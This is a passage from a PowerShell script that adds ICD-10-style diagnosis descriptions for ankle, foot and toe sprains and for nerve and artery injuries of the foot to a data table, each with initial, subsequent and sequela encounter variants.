$DiagnosisList.Rows.Add("Sprain of unspecified ligament of left ankle","Sprain of unspecified ligament of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of left ankle","Sprain of unspecified ligament of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of left ankle","Sprain of unspecified ligament of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of unspecified ankle","Sprain of unspecified ligament of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of unspecified ankle","Sprain of unspecified ligament of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of unspecified ligament of unspecified ankle","Sprain of unspecified ligament of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of right ankle","Sprain of calcaneofibular ligament of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of right ankle","Sprain of calcaneofibular ligament of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of right ankle","Sprain of calcaneofibular ligament of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of left ankle","Sprain of calcaneofibular ligament of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of left ankle","Sprain of calcaneofibular ligament of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of left ankle","Sprain of calcaneofibular ligament of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of unspecified ankle","Sprain of calcaneofibular ligament of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of unspecified ankle","Sprain of calcaneofibular ligament of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of calcaneofibular ligament of unspecified ankle","Sprain of calcaneofibular ligament of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of right ankle","Sprain of deltoid ligament of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of right ankle","Sprain of deltoid ligament of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of right ankle","Sprain of deltoid ligament of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of left ankle","Sprain of deltoid ligament of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of left ankle","Sprain of deltoid ligament of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of left ankle","Sprain of deltoid ligament of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of unspecified ankle","Sprain of deltoid ligament of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of unspecified ankle","Sprain of deltoid ligament of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of deltoid ligament of unspecified ankle","Sprain of deltoid ligament of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of right ankle","Sprain of tibiofibular ligament of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of right ankle","Sprain of tibiofibular ligament of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of right ankle","Sprain of tibiofibular ligament of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of left ankle","Sprain of tibiofibular ligament of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of left ankle","Sprain of tibiofibular ligament of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of left ankle","Sprain of tibiofibular ligament of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of unspecified ankle","Sprain of tibiofibular ligament of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of unspecified ankle","Sprain of tibiofibular ligament of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tibiofibular ligament of unspecified ankle","Sprain of tibiofibular ligament of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of right ankle","Sprain of other ligament of right ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of right ankle","Sprain of other ligament of right ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of right ankle","Sprain of other ligament of right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of left ankle","Sprain of other ligament of left ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of left ankle","Sprain of other ligament of left ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of left ankle","Sprain of other ligament of left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of unspecified ankle","Sprain of other ligament of unspecified ankle, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of unspecified ankle","Sprain of other ligament of unspecified ankle, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of other ligament of unspecified ankle","Sprain of other ligament of unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right great toe","Unspecified sprain of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right great toe","Unspecified sprain of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right great toe","Unspecified sprain of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left great toe","Unspecified sprain of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left great toe","Unspecified sprain of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left great toe","Unspecified sprain of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified great toe","Unspecified sprain of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified great toe","Unspecified sprain of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified great toe","Unspecified sprain of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right lesser toe(s)","Unspecified sprain of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right lesser toe(s)","Unspecified sprain of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right lesser toe(s)","Unspecified sprain of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left lesser toe(s)","Unspecified sprain of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left lesser toe(s)","Unspecified sprain of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left lesser toe(s)","Unspecified sprain of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified lesser toe(s)","Unspecified sprain of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified lesser toe(s)","Unspecified sprain of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified lesser toe(s)","Unspecified sprain of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified toe(s)","Unspecified sprain of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified toe(s)","Unspecified sprain of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified toe(s)","Unspecified sprain of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right great toe","Sprain of interphalangeal joint of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right great toe","Sprain of interphalangeal joint of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right great toe","Sprain of interphalangeal joint of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left great toe","Sprain of interphalangeal joint of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left great toe","Sprain of interphalangeal joint of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left great toe","Sprain of interphalangeal joint of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified great toe","Sprain of interphalangeal joint of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified great toe","Sprain of interphalangeal joint of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified great toe","Sprain of interphalangeal joint of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right lesser toe(s)","Sprain of interphalangeal joint of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right lesser toe(s)","Sprain of interphalangeal joint of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of right lesser toe(s)","Sprain of interphalangeal joint of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left lesser toe(s)","Sprain of interphalangeal joint of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left lesser toe(s)","Sprain of interphalangeal joint of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of left lesser toe(s)","Sprain of interphalangeal joint of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified lesser toe(s)","Sprain of interphalangeal joint of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified lesser toe(s)","Sprain of interphalangeal joint of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified lesser toe(s)","Sprain of interphalangeal joint of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified toe(s)","Sprain of interphalangeal joint of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified toe(s)","Sprain of interphalangeal joint of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of interphalangeal joint of unspecified toe(s)","Sprain of interphalangeal joint of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of right great toe","Sprain of metatarsophalangeal joint of right great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of right great toe","Sprain of metatarsophalangeal joint of right great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of right great toe","Sprain of metatarsophalangeal joint of right great toe, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of left great toe","Sprain of metatarsophalangeal joint of left great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of left great toe","Sprain of metatarsophalangeal joint of left great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of left great toe","Sprain of metatarsophalangeal joint of left great toe, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified great toe","Sprain of metatarsophalangeal joint of unspecified great toe, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified great toe","Sprain of metatarsophalangeal joint of unspecified great toe, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified great toe","Sprain of metatarsophalangeal joint of unspecified great toe, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of right lesser toe(s)","Sprain of metatarsophalangeal joint of right lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of right lesser toe(s)","Sprain of metatarsophalangeal joint of right lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of right lesser toe(s)","Sprain of metatarsophalangeal joint of right lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of left lesser toe(s)","Sprain of metatarsophalangeal joint of left lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of left lesser toe(s)","Sprain of metatarsophalangeal joint of left lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of left lesser toe(s)","Sprain of metatarsophalangeal joint of left lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified lesser toe(s)","Sprain of metatarsophalangeal joint of unspecified lesser toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified lesser toe(s)","Sprain of metatarsophalangeal joint of unspecified lesser toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified lesser toe(s)","Sprain of metatarsophalangeal joint of unspecified lesser toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified toe(s)","Sprain of metatarsophalangeal joint of unspecified toe(s), initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified toe(s)","Sprain of metatarsophalangeal joint of unspecified toe(s), subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of metatarsophalangeal joint of unspecified toe(s)","Sprain of metatarsophalangeal joint of unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right foot","Unspecified sprain of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right foot","Unspecified sprain of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of right foot","Unspecified sprain of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left foot","Unspecified sprain of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left foot","Unspecified sprain of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of left foot","Unspecified sprain of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified foot","Unspecified sprain of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified foot","Unspecified sprain of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified sprain of unspecified foot","Unspecified sprain of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of right foot","Sprain of tarsal ligament of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of right foot","Sprain of tarsal ligament of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of right foot","Sprain of tarsal ligament of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of left foot","Sprain of tarsal ligament of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of left foot","Sprain of tarsal ligament of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of left foot","Sprain of tarsal ligament of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of unspecified foot","Sprain of tarsal ligament of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of unspecified foot","Sprain of tarsal ligament of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsal ligament of unspecified foot","Sprain of tarsal ligament of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of right foot","Sprain of tarsometatarsal ligament of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of right foot","Sprain of tarsometatarsal ligament of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of right foot","Sprain of tarsometatarsal ligament of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of left foot","Sprain of tarsometatarsal ligament of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of left foot","Sprain of tarsometatarsal ligament of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of left foot","Sprain of tarsometatarsal ligament of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of unspecified foot","Sprain of tarsometatarsal ligament of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of unspecified foot","Sprain of tarsometatarsal ligament of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Sprain of tarsometatarsal ligament of unspecified foot","Sprain of tarsometatarsal ligament of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of right foot","Other sprain of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right foot","Other sprain of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of right foot","Other sprain of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of left foot","Other sprain of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left foot","Other sprain of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of left foot","Other sprain of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified foot","Other sprain of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified foot","Other sprain of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other sprain of unspecified foot","Other sprain of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, unspecified leg","Injury of lateral plantar nerve, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, unspecified leg","Injury of lateral plantar nerve, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, unspecified leg","Injury of lateral plantar nerve, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, right leg","Injury of lateral plantar nerve, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, right leg","Injury of lateral plantar nerve, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, right leg","Injury of lateral plantar nerve, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, left leg","Injury of lateral plantar nerve, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, left leg","Injury of lateral plantar nerve, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of lateral plantar nerve, left leg","Injury of lateral plantar nerve, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, unspecified leg","Injury of medial plantar nerve, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, unspecified leg","Injury of medial plantar nerve, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, unspecified leg","Injury of medial plantar nerve, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, right leg","Injury of medial plantar nerve, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, right leg","Injury of medial plantar nerve, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, right leg","Injury of medial plantar nerve, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, left leg","Injury of medial plantar nerve, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, left leg","Injury of medial plantar nerve, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of medial plantar nerve, left leg","Injury of medial plantar nerve, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, unspecified leg","Injury of deep peroneal nerve at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, unspecified leg","Injury of deep peroneal nerve at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, unspecified leg","Injury of deep peroneal nerve at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, right leg","Injury of deep peroneal nerve at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, right leg","Injury of deep peroneal nerve at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, right leg","Injury of deep peroneal nerve at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, left leg","Injury of deep peroneal nerve at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, left leg","Injury of deep peroneal nerve at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of deep peroneal nerve at ankle and foot level, left leg","Injury of deep peroneal nerve at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, unspecified leg","Injury of cutaneous sensory nerve at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, unspecified leg","Injury of cutaneous sensory nerve at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, unspecified leg","Injury of cutaneous sensory nerve at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, right leg","Injury of cutaneous sensory nerve at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, right leg","Injury of cutaneous sensory nerve at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, right leg","Injury of cutaneous sensory nerve at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, left leg","Injury of cutaneous sensory nerve at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, left leg","Injury of cutaneous sensory nerve at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at ankle and foot level, left leg","Injury of cutaneous sensory nerve at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, right leg","Injury of other nerves at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, right leg","Injury of other nerves at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, right leg","Injury of other nerves at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, left leg","Injury of other nerves at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, left leg","Injury of other nerves at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, left leg","Injury of other nerves at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, unspecified leg","Injury of other nerves at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, unspecified leg","Injury of other nerves at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at ankle and foot level, unspecified leg","Injury of other nerves at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, unspecified leg","Injury of unspecified nerve at ankle and foot level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, unspecified leg","Injury of unspecified nerve at ankle and foot level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, unspecified leg","Injury of unspecified nerve at ankle and foot level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, right leg","Injury of unspecified nerve at ankle and foot level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, right leg","Injury of unspecified nerve at ankle and foot level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, right leg","Injury of unspecified nerve at ankle and foot level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, left leg","Injury of unspecified nerve at ankle and foot level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, left leg","Injury of unspecified nerve at ankle and foot level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at ankle and foot level, left leg","Injury of unspecified nerve at ankle and foot level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of right foot","Unspecified injury of dorsal artery of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of right foot","Unspecified injury of dorsal artery of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of right foot","Unspecified injury of dorsal artery of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of left foot","Unspecified injury of dorsal artery of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of left foot","Unspecified injury of dorsal artery of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of left foot","Unspecified injury of dorsal artery of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of unspecified foot","Unspecified injury of dorsal artery of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of unspecified foot","Unspecified injury of dorsal artery of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of dorsal artery of unspecified foot","Unspecified injury of dorsal artery of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of right foot","Laceration of dorsal artery of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of right foot","Laceration of dorsal artery of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of right foot","Laceration of dorsal artery of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of left foot","Laceration of dorsal artery of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of left foot","Laceration of dorsal artery of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of left foot","Laceration of dorsal artery of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of unspecified foot","Laceration of dorsal artery of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of unspecified foot","Laceration of dorsal artery of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of dorsal artery of unspecified foot","Laceration of dorsal artery of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of right foot","Other specified injury of dorsal artery of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of right foot","Other specified injury of dorsal artery of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of right foot","Other specified injury of dorsal artery of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of left foot","Other specified injury of dorsal artery of left foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of left foot","Other specified injury of dorsal artery of left foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of left foot","Other specified injury of dorsal artery of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of unspecified foot","Other specified injury of dorsal artery of unspecified foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of unspecified foot","Other specified injury of dorsal artery of unspecified foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of dorsal artery of unspecified foot","Other specified injury of dorsal artery of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of right foot","Unspecified injury of plantar artery of right foot, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of plantar artery of right foot","Unspecified injury of plantar artery of right foot, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury 